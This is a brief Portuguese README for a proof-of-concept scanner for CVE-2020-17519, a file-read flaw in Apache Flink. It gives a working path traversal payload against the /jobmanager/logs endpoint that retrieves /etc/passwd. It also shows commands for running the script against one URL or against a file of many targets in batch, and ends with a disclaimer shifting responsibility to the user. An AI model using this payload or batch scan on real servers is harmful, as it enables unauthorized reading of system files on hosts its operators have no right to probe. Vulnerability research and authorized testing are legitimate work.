
CVE-2020-17519; Apache Flink leitura arbitrária de arquivos; detecção em lote
Apache Flink 1.5.1 ~ 1.11.2
POC
/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
python3 CVE-2020-17519 --help exibe a ajuda de uso
python3 CVE-2020-17519 -u http://127.0.0.1:8080 verifica se um endereço possui vulnerabilidade
python3 CVE-2020-17519 -f target.txt verifica vulnerabilidades em lote
Quaisquer consequências ou perdas diretas ou indiretas causadas pela disseminação ou utilização das informações fornecidas neste documento são de responsabilidade do usuário; o autor não assume nenhuma responsabilidade por isso.